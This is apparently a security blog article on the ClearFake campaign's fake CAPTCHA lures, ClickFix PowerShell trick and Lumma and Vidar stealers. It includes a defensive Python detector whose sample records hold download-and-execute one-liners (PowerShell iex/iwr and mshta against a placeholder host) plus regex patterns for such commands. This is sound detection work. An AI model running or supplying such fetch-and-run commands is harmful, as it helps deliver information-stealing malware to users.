The ClearFake malware campaign has emerged as a significant cybersecurity threat, compromising over 9,300 websites and employing deceptive tactics to distribute malicious software. By masquerading as legitimate reCAPTCHA or Cloudflare Turnstile verifications, ClearFake tricks users into downloading information-stealing malware such as Lumma Stealer and Vidar Stealer (The Hacker News).
Evolution of ClearFake
Initially identified in July 2023, ClearFake utilized fake browser update prompts on compromised WordPress sites to deliver malware. Over time, the campaign has incorporated advanced techniques like EtherHiding, which leverages Binance Smart Chain (BSC) contracts to retrieve payloads, enhancing the attack’s resilience and complicating detection efforts (The Hacker News).
By May 2024, ClearFake introduced the ClickFix tactic, a social engineering method that deceives users into executing malicious PowerShell commands under the pretense of resolving fictitious technical issues. This approach has been further refined with additional interactions involving the BSC, including system fingerprinting and the retrieval of encrypted malicious code hosted on platforms like Cloudflare Pages (The Hacker News).
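The ClickFix step described above leaves a recognisable trace on the endpoint: a PowerShell or mshta process started from an interactive parent (the Run dialog under explorer.exe, for instance) with a command line built to run blindly when pasted. The following detection heuristic is an added example for this article, not code from The Hacker News or from any vendor cited here. It scores constructed process-creation records modelled loosely on Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the record layout, sample values, hostnames and the score threshold are all assumptions chosen for illustration.

```python
"""Heuristic detector for ClickFix-style PowerShell launches (added example).

Scores process-creation records of the kind an EDR or Sysmon (Event ID 1)
emits. Field names and the sample records below are constructed assumptions,
not data from the referenced article.
"""
import re

# Parents that indicate a human pasted or typed the command (Run dialog,
# File Explorer, terminal) rather than a script, service or scheduled task.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}

# Flags and cmdlets typical of a one-liner meant to be pasted without reading:
# hidden window, execution-policy bypass, encoded payload, remote download.
SUSPICIOUS_TOKENS = [
    (re.compile(r"-(w|win|window(style)?)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I),
     "remote download"),
    (re.compile(r"\bmshta(\.exe)?\b", re.I), "mshta launcher"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "inline execution"),
]

WATCHED_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe"}


def _basename(path):
    """Return the file name of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation record.

    One point per indicator: interactive parent plus each suspicious token
    found in the command line. Non-watched images always score zero.
    """
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if image not in WATCHED_IMAGES:
        return 0, reasons
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"launched interactively from {parent}")
    for pattern, label in SUSPICIOUS_TOKENS:
        if pattern.search(cmd):
            reasons.append(label)
    return len(reasons), reasons


def detect_clickfix(events, threshold=2):
    """Return the records whose score reaches the threshold, with reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"RecordId": ev.get("RecordId"), "score": score, "reasons": reasons})
    return hits


# Constructed sample records (assumed layout; hostnames are placeholders).
SAMPLE_EVENTS = [
    {  # ClickFix-like: pasted into the Run dialog, hidden, bypass, download, iex
        "RecordId": 1,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/verify)"',
    },
    {  # Admin script from a scheduled task: bypass alone should not alert
        "RecordId": 2,
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1",
    },
    {  # Benign interactive use
        "RecordId": 3,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell Get-Process",
    },
    {  # mshta launched from the Run dialog against a remote .hta
        "RecordId": 4,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/verify.hta",
    },
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(hit)
```

The threshold is deliberately low for the parent-process indicator: an execution-policy bypass on its own is routine in administrative tooling (record 2), but the same flag combined with an interactive parent and a hidden window is the shape a pasted lure takes. In production the same scoring would run over real Sysmon or EDR telemetry, and the RunMRU history of affected user profiles is a natural place to confirm what was pasted.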
Current Impact
As of February 2025, ClearFake has compromised at least 9,300 websites, and its operators update the framework’s code, lures, and payloads daily. The malware now relies on multiple data points stored within the Binance Smart Chain, such as JavaScript code, AES keys, URLs for lure HTML files, and ClickFix PowerShell commands. This evolution underscores the campaign’s persistent and adaptive nature, posing a significant risk to users worldwide (The Hacker News).
Distribution of Lumma Stealer and Vidar Stealer
ClearFake’s primary payloads, Lumma Stealer and Vidar Stealer, are sophisticated information-stealing malware strains. Lumma Stealer, written in C, is designed to extract a wide array of data from compromised systems, including credentials, cryptocurrency wallets, and system information (Cyfirma). Vidar Stealer operates similarly, focusing on harvesting sensitive information and facilitating further malicious activities (Cyfirma).
Protective Measures
To safeguard against threats like ClearFake, users and organizations should adopt the following practices:
- Exercise Caution with Online Prompts: Be skeptical of unexpected prompts for software updates or security verifications, especially those encountered on unfamiliar or untrusted websites.
- Maintain Updated Software: Regularly update operating systems, browsers, and security software to protect against known vulnerabilities.
- Implement Robust Security Protocols: Utilize comprehensive security solutions that include real-time threat detection and response capabilities.
- Educate Users: Provide training on recognizing phishing attempts and social engineering tactics to reduce the likelihood of successful attacks.
For a more detailed analysis of the ClearFake campaign and its methodologies, refer to the comprehensive coverage by The Hacker News.
References
The Hacker News. (2025, March). ClearFake infects 9,300 sites, uses fake reCAPTCHA lures to deploy malware. Retrieved from https://thehackernews.com/2025/03/clearfake-infects-9300-sites-uses-fake.html?m=1
Cyfirma. (n.d.). Lumma Stealer: Tactics, impact, and defense strategies. Retrieved from https://www.cyfirma.com/research/lumma-stealer-tactics-impact-and-defense-strategies/
Cyfirma. (n.d.). Vidar Stealer: An in-depth analysis of an information-stealing malware. Retrieved from https://www.cyfirma.com/research/vidar-stealer-an-in-depth-analysis-of-an-information-stealing-malware/